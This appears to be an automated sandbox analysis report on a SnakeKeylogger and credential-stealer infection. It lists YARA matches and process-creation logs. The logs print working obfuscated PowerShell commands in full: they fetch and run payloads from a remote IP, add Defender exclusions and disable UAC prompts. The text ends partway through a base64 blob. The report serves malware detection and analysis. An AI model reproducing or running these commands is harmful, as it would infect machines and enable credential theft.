                  Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.a380b24.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4696, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFow